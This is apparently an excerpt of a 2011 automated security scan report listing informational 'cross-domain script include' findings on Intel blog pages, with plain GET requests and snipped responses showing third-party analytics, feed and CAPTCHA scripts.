<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...
</script>


<script src="//s.ytimg.com/yt/jsbin/www-browse-vflF9ViWz.js"></script>
...[SNIP]...

18. Cross-domain script include  previous  next
There are 122 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appdeveloper.intel.com
Path:   /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Issue detail

The response dynamically includes the following script from another domain:
  • https://api-secure.recaptcha.net/challenge?k=6LeMuAcAAAAAADFmx9xeDOuxDOR7xMIB-cJUbQcg

Request

GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:17:40 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<div class="description"><script type="text/javascript" src="https://api-secure.recaptcha.net/challenge?k=6LeMuAcAAAAAADFmx9xeDOuxDOR7xMIB-cJUbQcg"></script>
...[SNIP]...

18.2. http://blogs.intel.com/csr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2010/12/sponsors_of_tomorrow_students.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/celebrating_the_brightest_pre-.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/do_us_companies_lag_europe_on.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/helping_over_4000_families_rec.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/my_11_csr_resolutions_for_2011.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/students_really_get_the_csr_co.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=21860 t=1296947772964579
Connection: close
Content-Length: 67274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/students_really_get_the_csr_co.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/helping_over_4000_families_rec.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/my_11_csr_resolutions_for_2011.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/celebrating_the_brightest_pre-.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/do_us_companies_lag_europe_on.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2010/12/sponsors_of_tomorrow_students.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.3. http://blogs.intel.com/csr/2010/06/what_do_intel_chips_and_sam_ad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/2010/06/what_do_intel_chips_and_sam_ad.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2010/06/what_do_intel_chips_and_sam_ad.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/2010/06/what_do_intel_chips_and_sam_ad.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=8258 t=1296947776634830
Connection: close
Content-Length: 30647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2010/06/what_do_intel_chips_and_sam_ad.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.4. http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/2011/01/solar_power_is_learning_power.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/2011/01/solar_power_is_learning_power.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=6197 t=1296947772984947
Vary: Accept-Encoding
Connection: close
Content-Length: 32683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.5. http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/2011/01/the_final_four_the_super_bowl.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/2011/01/the_final_four_the_super_bowl.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=4566 t=1296947773041567
Connection: close
Content-Length: 33177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.6. http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/2011/02/investing_big_in_renewable_ene.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/2011/02/investing_big_in_renewable_ene.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=22987 t=1296947772962393
Connection: close
Content-Length: 33158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.7. http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/2011/02/social_entrepreneurship_buzz_w.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/2011/02/social_entrepreneurship_buzz_w.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=22471 t=1296947772891159
Vary: Accept-Encoding
Connection: close
Content-Length: 31218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>

       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.8. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/assets_c/2011/02/DSC07688-thumb-300x225.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/assets_c/2011/02/DSC07688-thumb-300x225.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5317 t=1296947773190967
Content-Length: 377
Connection: close

<html>
<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">

<img src="http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225.jpg" width="300" height="225" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.9. http://blogs.intel.com/csr/authors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/authors

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/authors HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:16 GMT
Server: Apache
Content-Location: authors.php
Vary: negotiate,Accept-Encoding
TCN: choice
Content-Type: text/html; charset=UTF-8
CacheHit: D=13793 t=1296947776564222
Connection: close
Content-Length: 76975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.10. http://blogs.intel.com/csr/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/education/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/education/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:14 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=8466 t=1296947774560801
Connection: close
Content-Length: 183197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.11. http://blogs.intel.com/csr/general-csr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/general-csr/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/general-csr/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=26252 t=1296947772892953
Vary: Accept-Encoding
Connection: close
Content-Length: 189575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.12. http://blogs.intel.com/csr/green/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/green/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /csr/green/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=6714 t=1296947772333211
Vary: Accept-Encoding
Connection: close
Content-Length: 67616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.13. http://blogs.intel.com/healthcare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /healthcare/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/03/changing_our_perspectives_on_healthcare_reform.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/dishman_provides_testimony_to_health_it_policy_committee_on_the_use_of_health_it_for_patient_and_fam.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/testimony_to_senate_aging_committee.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/think_big_as_we_engage_patients_families_in_a_healthcare_system_for_the_21st_century.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/07/my_opinion_e-care_is_ethical_effective_and_economical_care.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/07/remembering_robert_butler_a_wakeup_call.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/08/ehrs_healthy_relationships_not_health_records.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/08/the_hype_and_hope_of_mhealth.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/10/towards_accountable_care_cultures_minding_our_clinical_footprint.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php
  • http://www.google-analytics.com/urchin.js

Request

GET /healthcare/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:23 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=7768 t=1296947783723161
Vary: Accept-Encoding
Connection: close
Content-Length: 172383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/10/towards_accountable_care_cultures_minding_our_clinical_footprint.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/08/the_hype_and_hope_of_mhealth.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/08/ehrs_healthy_relationships_not_health_records.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/07/my_opinion_e-care_is_ethical_effective_and_economical_care.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/07/remembering_robert_butler_a_wakeup_call.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>        
           
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/testimony_to_senate_aging_committee.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/dishman_provides_testimony_to_health_it_policy_committee_on_the_use_of_health_it_for_patient_and_fam.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/04/think_big_as_we_engage_patients_families_in_a_healthcare_system_for_the_21st_century.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>    
       
   
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2010/03/changing_our_perspectives_on_healthcare_reform.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.14. http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php
  • http://www.google-analytics.com/urchin.js

Request

GET /healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=5263 t=1296947782454034
Vary: Accept-Encoding
Connection: close
Content-Length: 38886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</a>    
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Stats -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.15. http://blogs.intel.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/im_ian_an_engineerhttpwwwintelcomjobs_at.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/intels_student_ambassadors_rock.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/pay_stock_and_benefits_yes_im_tripping.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/real-time_report_about_a_surprise_intel_benefit.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/2011_and_beyond.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/interviewing_101_being_ready_for_intel.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php
  • http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php
  • http://v6.flickrshow.com/scripts/
  • http://www.google-analytics.com/urchin.js

Request

GET /jobs/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:16:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5205 t=1296947781468896
Connection: close
Content-Length: 42181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja">



...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

   
                   <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/2011_and_beyond.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2011/01/interviewing_101_being_ready_for_intel.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/im_ian_an_engineerhttpwwwintelcomjobs_at.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/real-time_report_about_a_surprise_intel_benefit.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
       <script src="http://feeds.feedburner.com/~s/IntelBlogs?i=http://blogs.intel.com/jobs/2010/12/intels_student_ambassadors_rock.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>
       
